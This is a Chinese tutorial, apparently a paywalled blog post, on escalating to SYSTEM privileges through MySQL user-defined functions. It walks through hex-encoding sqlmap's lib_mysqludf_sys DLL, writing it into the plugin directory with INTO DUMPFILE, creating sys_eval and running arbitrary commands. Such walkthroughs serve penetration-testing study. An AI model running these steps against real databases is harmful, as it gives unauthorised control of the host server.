本文详细介绍了MySQL中的用户自定义函数(UDF)及其在渗透测试中的应用,特别是在提权过程中的作用。文章讨论了利用UDF提权的条件,包括数据库版本和用户权限,并给出了具体的本地利用步骤,如通过hex编码传输和执行系统命令。此外,还分享了实战案例,演示了如何在Linux环境中利用UDF进行命令执行,并提供了自动化脚本的思路。
一、什么是udf
udf 全称为:user defined function,意为用户自定义函数;用户可以添加自定义的新函数到Mysql中,以达到功能的扩充,调用方式与一般系统自带的函数相同,例如 contact(),user(),version()等函数。
udf 文件后缀一般为 dll,由C、C++编写
二、udf在渗透中的作用
在一般渗透过程中,拿下一台windows服务器的webshell时,由于webshell权限较低,有些操作无法进行,而此时本地恰好存在mysql数据库,那么udf可能就派上用场了;由于windows安装的mysql进程一般都拥有管理员权限,这就意味着用户自定义的函数也拥有管理员权限,我们也就拥有了执行管理员命令的权限,这时新建管理员用户等操作也就轻而易举了,大多数人称为这一操作为udf提权,其实表达不够准确,应该称为通过mysql获得管理员权限。
三、利用条件
利用udf的条件其实还是挺苛刻的
mysql用户权限问题
-
获得一个数据库账号,拥有对MySQL的insert和delete权限。以root为佳。
-
拥有将udf.dll写入相应目录的权限。
四、数据库版本问题
udf利用的其中一步,是要将我们的xxx.dll文件上传到mysql检索目录中,mysql各版本的检索目录有所不同:
| 版本 | 路径 |
|---|---|
| MySQL < 5.0 | 导出路径随意; |
| 5.0 <= MySQL< 5.1 | 需要导出至目标服务器的系统目录(如:c:/windows/system32/) |
| 5.1 < MySQL | 必须导出到MySQL安装目录下的lib\plugin文件夹下 |
一般Lib、Plugin文件夹需要手工建立(可用NTFS ADS流模式突破进而创建文件夹)
五、本地利用过程
1、获取Mysql安装路径
select @basedir
2、查看可操作路径
show global variables like "%secure%"
secure_file_priv值为null,表示mysql不允许导入导出,此时我们只能通过别的方法将udf.dll写入安装路径
3、查看plugin目录路径
select @@plugin_dir
4、将dll上传方式推荐几种
将dll上传到安装路径的方式:
通过webshell上传
以hex方式直接上传
sqlmap中现有的udf文件,分为32位和64位,一定要选择对版本,获取sqlmap的udf方式
5、sqlmap中udf获取方式
自动化注入工具Sqlmap已经集成了此功能。
在 \sqlmap\data\udf\mysql\windows\64目录下存放着lib_mysqludf_sys.dll_
- 但是sqlmap中自带的shell以及一些二进制文件,为了防止误杀都经过异或编码,不能直接使用
可以利用sqlmap 自带的解码工具cloak.py,在sqlmap\extra\cloak中打开命令行,来对lib_mysqludf_sys.dll_进行解码在,然后在直接利用,输入下面的
cloak.py -d -i C:\sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_
接着就会在\sqlmap\data\udf\mysql\windows\64目录下生成一个dll的文件lib_mysqludf_sys.dll,这个我们就可以直接拿来利用
攻击者可以利用lib_mysqludf_sys提供的函数执行系统命令。
函数:
sys_eval,执行任意命令,并将输出返回。
sys_exec,执行任意命令,并将退出码返回。
sys_get,获取一个环境变量。
sys_set,创建或修改一个环境变量。
以我windows系统为例,mysql版本为MySQL5.7.26
注意:攻击过程中,首先需要将lib_mysqludf_sys ( 目标为windows时,lib_mysqludf_sys.dll;linux时,lib_mysqludf_sys.so)上传到数据库能访问的路径下。
- 直接将刚刚生成的64位windows的dll文件复制到
D:\phpstudy8\Extensions\MySQL5.7.26\lib\plugin中,然后再mysql中执行以下语句
create function sys_eval returns string soname 'udf.dll'
然后就可以任意命令执行了
sys_eval,执行任意命令,并将输出返回。
sys_exec,执行任意命令,并将退出码返回。
sys_get,获取一个环境变量。
sys_set,创建或修改一个环境变量。
select sys_eval('ipconfig')
六、实战情况之一,hex编/解传入mysql系统提权
- 本地利用的情况,你得已经上传webshell的情况下才能成功。如果你在sql实战中遇到可以使用outfile等上传文件的情况下,如何利用来系统权限命令执行。下面我们先熟悉一下本地测试一下具体情况
为了将这个转换为十六进制,可以借助mysql中的hex函数,先将udf.dll移动到C盘中,这样路径也清晰一些,然后执行下面命令
select hex(load_file('C:/udf.dll')) into dumpfile 'c:/udf.txt'
成功生成了十六进制形式流
接下来就是把本地的udf16进制形式通过我们已经获得的webshell传到目标主机上。
一、新建一个表,名为udftmp,用于存放本地传来的udf文件的内容。
create table udftmp (c BLOB)
二、在udftmp中写入udf文件内容
INSERT INTO udftmp values(unhex('udf文件的16进制格式'))
三、将udf文件内容传入新建的udf文件中,路径根据自己的@@plugin_dir修改 //对于mysql小于5.1的,导出目录为C:\Windows\或C:\Windows\System32\
select c from udftmp into dumpfile 'D:/phpstudy8/Extensions/MySQL5.7.26/lib/plugin/udf.dll'
四、执行下面语句,就可以system权限下命令任意执行,这电脑就沦陷了,执行命令上面已经说过,就不复述了
create function sys_eval returns string soname 'udf.dll'
最低0.47元/天 解锁文章
扫一扫
3738
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
